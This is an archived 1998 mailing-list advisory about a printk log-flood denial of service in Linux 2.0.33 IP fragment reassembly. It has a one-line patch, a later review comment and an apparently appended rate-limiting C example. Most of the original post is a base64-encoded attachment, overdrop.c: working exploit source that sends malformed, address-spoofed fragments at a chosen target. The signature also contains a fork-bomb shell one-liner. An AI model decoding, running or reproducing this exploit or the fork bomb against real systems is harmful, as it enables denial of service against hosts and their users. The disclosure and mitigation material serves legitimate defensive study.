I'm not sure if it's known, but I haven't found anything about it. No matter, there's something strange in net/ipv4/ip_fragment.h (it's probably Alan's fault):

[ in function ip_glue ]

    if(len>65535)
    {
        printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
        ip_statistics.IpReasmFails++;
        ip_free(qp);
        return NULL;
    }

Right, printk with no NETDEBUG nor anything else. So, there's a potential DoS attack - I wrote a simple exploit by modifying the teardrop source (mainly, fragmentation offset of second packet = 0xFFFF), and it's quite nasty (see attachment).

Fix:

--- ip_fragment.c.orig Fri Apr 17 16:42:38 1998
+++ ip_fragment.c Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@ if(len>65535) { - printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)); + NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr))); ip_statistics.IpReasmFails++; ip_free(qp); return NULL; _______________________________________________________________________ Michal Zalewski [lcamtufat_private] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86] --8323328-871852648-892826485=:211 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="overdrop.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.980417172125.211B@genome> Content-Description: Ly8gb3ZlcmRyb3AgYnkgbGNhbXR1ZiBbTGludXggMi4wLjMzIHByaW50ayBh YnVzZV0NCi8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLQ0KLy8gYmFzZWQgb24gKHJlYXBlZCBmcm9tKSB0ZWFy ZHJvcCBieSByb3V0ZXxkYWVtb245DQoNCiNpbmNsdWRlIDxzdGRpby5oPg0K I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu Y2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVk ZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPG5ldGluZXQvdWRwLmg+DQoj aW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+ DQojaW5jbHVkZSA8c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0 Lmg+DQoNCiNkZWZpbmUgSVBfTUYJMHgyMDAwDQojZGVmaW5lIElQSAkweDE0 DQojZGVmaW5lIFVEUEgJMHg4DQojZGVmaW5lIFBBRERJTkcJMHgxYw0KI2Rl ZmluZSBNQUdJQwkweDMNCiNkZWZpbmUgQ09VTlQJMHhCRUVGDQojZGVmaW5l IEZSQUcyCTB4RkZGRg0KDQp2b2lkIHVzYWdlKGNoYXIgKm5hbWUpIHsNCiAg ZnByaW50ZihzdGRlcnIsIiVzIGRzdF9pcCBbIC1uIGhvd19tYW55IF0gWyAt cyBzcmNfaXAgXVxuIixuYW1lKTsNCiAgZXhpdCgwKTsNCn0NCg0KdV9sb25n IG5hbWVfcmVzb2x2ZShjaGFyICpob3N0X25hbWUpIHsNCiAgc3RydWN0IGlu X2FkZHIgYWRkcjsNCiAgc3RydWN0IGhvc3RlbnQgKmhvc3RfZW50Ow0KICBp ZiAoKGFkZHIuc19hZGRyPWluZXRfYWRkcihob3N0X25hbWUpKT09LTEpIHsN CiAgICBpZiAoIShob3N0X2VudD1nZXRob3N0YnluYW1lKGhvc3RfbmFtZSkp KSByZXR1cm4gKDApOw0KICAgIGJjb3B5KGhvc3RfZW50LT5oX2FkZHIsKGNo 
YXIgKikmYWRkci5zX2FkZHIsaG9zdF9lbnQtPmhfbGVuZ3RoKTsNCiAgfQ0K ICByZXR1cm4gKGFkZHIuc19hZGRyKTsNCn0NCg0KDQp2b2lkIHNlbmRfZnJh Z3MoaW50IHNvY2ssdV9sb25nIHNyY19pcCx1X2xvbmcgZHN0X2lwLHVfc2hv cnQgc3JjX3BydCx1X3Nob3J0IGRzdF9wcnQpIHsNCiAgdV9jaGFyICpwYWNr ZXQ9TlVMTCwqcF9wdHI9TlVMTDsNCiAgdV9jaGFyIGJ5dGU7DQogIHN0cnVj dCBzb2NrYWRkcl9pbiBzaW47DQogIHNpbi5zaW5fZmFtaWx5PUFGX0lORVQ7 DQogIHNpbi5zaW5fcG9ydD1zcmNfcHJ0Ow0KICBzaW4uc2luX2FkZHIuc19h ZGRyPWRzdF9pcDsNCiAgcGFja2V0PSh1X2NoYXIgKiltYWxsb2MoSVBIK1VE UEgrUEFERElORyk7DQogIHBfcHRyPXBhY2tldDsNCiAgYnplcm8oKHVfY2hh ciAqKXBfcHRyLElQSCtVRFBIK1BBRERJTkcpOw0KICBieXRlPTB4NDU7DQog IG1lbWNweShwX3B0ciwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRy Kz0yOw0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKElQSCtVRFBIK1BB RERJTkcpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1o dG9ucygyNDIpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRy KXw9aHRvbnMoSVBfTUYpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAq KXBfcHRyKT0weDQwOw0KICBieXRlPUlQUFJPVE9fVURQOw0KICBtZW1jcHko cF9wdHIrMSwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRyKz00Ow0K ICAqKCh1X2xvbmcgKilwX3B0cik9c3JjX2lwOw0KICBwX3B0cis9NDsNCiAg KigodV9sb25nICopcF9wdHIpPWRzdF9pcDsNCiAgcF9wdHIrPTQ7DQogICoo KHVfc2hvcnQgKilwX3B0cik9aHRvbnMoc3JjX3BydCk7DQogIHBfcHRyKz0y Ow0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKGRzdF9wcnQpOw0KICBw X3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9ucyg4K1BBRERJ TkcpOw0KICBpZiAoc2VuZHRvKHNvY2sscGFja2V0LElQSCtVRFBIK1BBRERJ TkcsMCwoc3RydWN0IHNvY2thZGRyICopJnNpbiwNCiAgICAgIHNpemVvZihz dHJ1Y3Qgc29ja2FkZHIpKT09LTEpIHsNCiAgICBwZXJyb3IoIlxuc2VuZHRv Iik7DQogICAgZnJlZShwYWNrZXQpOw0KICAgIGV4aXQoMSk7DQogIH0NCiAg cF9wdHI9JnBhY2tldFsyXTsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9u cyhJUEgrTUFHSUMrMSk7DQogIHBfcHRyKz00Ow0KICAqKCh1X3Nob3J0ICop cF9wdHIpPWh0b25zKEZSQUcyKTsNCiAgaWYgKHNlbmR0byhzb2NrLHBhY2tl dCxJUEgrTUFHSUMrMSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLA0KICAg ICAgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpPT0tMSkgew0KICAgIHBlcnJv cigiXG5zZW5kdG8iKTsNCiAgICBmcmVlKHBhY2tldCk7DQogICAgZXhpdCgx 
KTsNCiAgfQ0KICBmcmVlKHBhY2tldCk7DQp9DQoNCg0KaW50IG1haW4oaW50 IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQogIGludCBvbmU9MSxjb3VudD0wLGks cmlwX3NvY2s7DQogIHVfbG9uZyAgc3JjX2lwPTAsZHN0X2lwPTA7DQogIHVf c2hvcnQgc3JjX3BydD0wLGRzdF9wcnQ9MDsNCiAgc3RydWN0IGluX2FkZHIg YWRkcjsNCiAgZnByaW50ZihzdGRlcnIsIm92ZXJkcm9wIGJ5IGxjYW10dWYg W2Jhc2VkIG9uIHRlYXJkcm9wIGJ5IHJvdXRlfGRhZW1vbjldXG5cbiIpOw0K ICBpZigocmlwX3NvY2s9c29ja2V0KEFGX0lORVQsU09DS19SQVcsSVBQUk9U T19SQVcpKTwwKSB7DQogICAgcGVycm9yKCJyYXcgc29ja2V0Iik7DQogICAg ZXhpdCgxKTsNCiAgfQ0KICBpZiAoc2V0c29ja29wdChyaXBfc29jayxJUFBS T1RPX0lQLElQX0hEUklOQ0wsKGNoYXIgKikmb25lLHNpemVvZihvbmUpKTww KSB7DQogICAgcGVycm9yKCJJUF9IRFJJTkNMIik7DQogICAgZXhpdCgxKTsN CiAgfQ0KICBpZiAoYXJnYyA8IDIpIHVzYWdlKGFyZ3ZbMF0pOw0KICBpZiAo IShkc3RfaXA9bmFtZV9yZXNvbHZlKGFyZ3ZbMV0pKSkgew0KICAgIGZwcmlu dGYoc3RkZXJyLCJDYW4ndCByZXNvbHZlIGRlc3RpbmF0aW9uIGFkZHJlc3Mu XG4iKTsNCiAgICBleGl0KDEpOw0KICB9DQogIHdoaWxlICgoaT1nZXRvcHQo YXJnYyxhcmd2LCJzOm46IikpIT1FT0YpIHsNCiAgICBzd2l0Y2ggKGkpIHsN CiAgICAgIGNhc2UgJ24nOg0KICAgICAgICBjb3VudCAgID0gYXRvaShvcHRh cmcpOw0KICAgICAgICBicmVhazsNCiAgICAgIGNhc2UgJ3MnOg0KICAgICAg ICBpZiAoIShzcmNfaXA9bmFtZV9yZXNvbHZlKG9wdGFyZykpKSB7DQogICAg ICAgICAgZnByaW50ZihzdGRlcnIsIkNhbid0IHJlc29sdmUgc291cmNlIGFk ZHJlc3MuXG4iKTsNCiAgICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQoJ YnJlYWs7DQogICAgICBkZWZhdWx0Og0KICAgICAgICB1c2FnZShhcmd2WzBd KTsNCiAgICAgICAgYnJlYWs7DQogICAgfQ0KICB9DQogIHNyYW5kb20oKHVu c2lnbmVkKSh0aW1lKCh0aW1lX3QpMCkpKTsNCiAgaWYgKCFjb3VudCkgY291 bnQ9Q09VTlQ7DQogIGZwcmludGYoc3RkZXJyLCJTZW5kaW5nIG92ZXJzaXpl ZCBwYWNrZXRzOlxuRnJvbTogIik7DQogIGlmICghc3JjX2lwKSBmcHJpbnRm KHN0ZGVyciwiICAgICAgIChyYW5kb20pIik7IGVsc2Ugew0KICAgIGFkZHIu c19hZGRyID0gc3JjX2lwOw0KICAgIGZwcmludGYoc3RkZXJyLCIlMTVzIixp bmV0X250b2EoYWRkcikpOw0KICB9DQogIGFkZHIuc19hZGRyID0gZHN0X2lw Ow0KICBmcHJpbnRmKHN0ZGVyciwiXG4gIFRvOiAlMTVzXG4iLGluZXRfbnRv YShhZGRyKSk7DQogIGZwcmludGYoc3RkZXJyLCIgQW10OiAlNWRcbiIsY291 bnQpOw0KICBmcHJpbnRmKHN0ZGVyciwiWyAiKTsNCiAgZm9yIChpPTA7aTxj 
b3VudDtpKyspIHsNCiAgICBpZiAoIXNyY19pcCkgc2VuZF9mcmFncyhyaXBf c29jayxyYW5kKCksZHN0X2lwLHJhbmQoKSxyYW5kKCkpOyBlbHNlDQogICAg ICBzZW5kX2ZyYWdzKHJpcF9zb2NrLHNyY19pcCxkc3RfaXAscmFuZCgpLHJh bmQoKSk7DQogICAgZnByaW50ZihzdGRlcnIsICJiMDB6ICIpOw0KICAgIHVz bGVlcCg1MDApOw0KICB9DQogIGZwcmludGYoc3RkZXJyLCAiXVxuIik7DQog IHJldHVybiAoMCk7DQp9DQo= --8323328-871852648-892826485=:211--
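Review bot: in the ip_glue hunk, wrapping the printk in NETDEBUG() compiles the message out of non-debug builds instead of throttling it, so the `ip_statistics.IpReasmFails++` line that follows becomes the only remaining signal that oversized fragments are arriving; consider a rate-limited message instead, or at least state in the description that operators should watch that counter, since the silenced path still consumes reassembly work per datagram.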
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:44 PDT
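The post's point is that an unthrottled printk on a remotely triggerable path turns a bounds check into a log flood. The following is an added example, not code from the post or from the kernel: a user-space model of the ip_glue length check with a rate-limited log gate, showing the mitigation the patch does not provide. The counter is still incremented on every oversized fragment (so the condition stays observable), while the log line is capped at a fixed burst per interval. All names (`log_ratelimit`, `check_reassembled_len`, `simulate_flood`), the 10-per-5-seconds budget and the constructed source address are assumptions made for the example.

```c
/* Added example (not from the original post or the Linux kernel): a user-space
 * model of the ip_glue length check with a rate-limited log gate. */
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>

#define MAX_IP_LEN 65535UL

/* Fixed-window limiter: at most `burst` messages per `interval` seconds.
 * (Hypothetical helper; the 2.0-era kernel had nothing like it.) */
struct log_ratelimit {
    uint32_t interval;      /* window length in seconds */
    uint32_t burst;         /* messages allowed per window */
    uint32_t window_start;  /* timestamp at which the current window opened */
    uint32_t printed;       /* messages emitted in the current window */
    uint32_t suppressed;    /* messages dropped in the current window */
};

static bool ratelimit_allow(struct log_ratelimit *rl, uint32_t now)
{
    if (now - rl->window_start >= rl->interval) {
        /* New window: report what was dropped so the flood is still visible. */
        if (rl->suppressed)
            printf("ratelimit: %u messages suppressed\n", rl->suppressed);
        rl->window_start = now;
        rl->printed = 0;
        rl->suppressed = 0;
    }
    if (rl->printed < rl->burst) {
        rl->printed++;
        return true;
    }
    rl->suppressed++;
    return false;
}

/* Stand-in for the ip_statistics counters used in the post. */
struct reasm_stats {
    unsigned long reasm_fails;  /* analogue of IpReasmFails: bumped on every drop */
    unsigned long log_lines;    /* messages that actually reached the log */
};

/* Model of the check: returns false (datagram dropped) when the reassembled
 * length exceeds the IP maximum. The counter always moves; the log line is gated. */
static bool check_reassembled_len(unsigned long len, const char *src, uint32_t now,
                                  struct log_ratelimit *rl, struct reasm_stats *st)
{
    if (len > MAX_IP_LEN) {
        st->reasm_fails++;
        if (ratelimit_allow(rl, now)) {
            st->log_lines++;
            printf("Oversized IP packet from %s.\n", src);
        }
        return false;
    }
    return true;
}

/* Simulates `n` oversized datagrams arriving at `per_second` each second from a
 * constructed documentation address; returns the number of log lines emitted. */
unsigned long simulate_flood(unsigned long n, uint32_t per_second, struct reasm_stats *st)
{
    struct log_ratelimit rl = { .interval = 5, .burst = 10 };
    for (unsigned long i = 0; i < n; i++) {
        uint32_t now = (uint32_t)(i / per_second);           /* synthetic clock */
        check_reassembled_len(70000UL, "192.0.2.1", now, &rl, st);
    }
    return st->log_lines;
}

int main(void)
{
    struct reasm_stats st = { 0, 0 };
    unsigned long lines = simulate_flood(1000, 100, &st);
    printf("reassembly failures counted: %lu, log lines emitted: %lu\n",
           st.reasm_fails, lines);
    return 0;
}
```

With 1000 oversized fragments over ten simulated seconds, the counter records all 1000 failures while only 20 log lines are written (10 per 5-second window), which is the property the NETDEBUG patch trades away: the event stays countable without the log becoming the bottleneck.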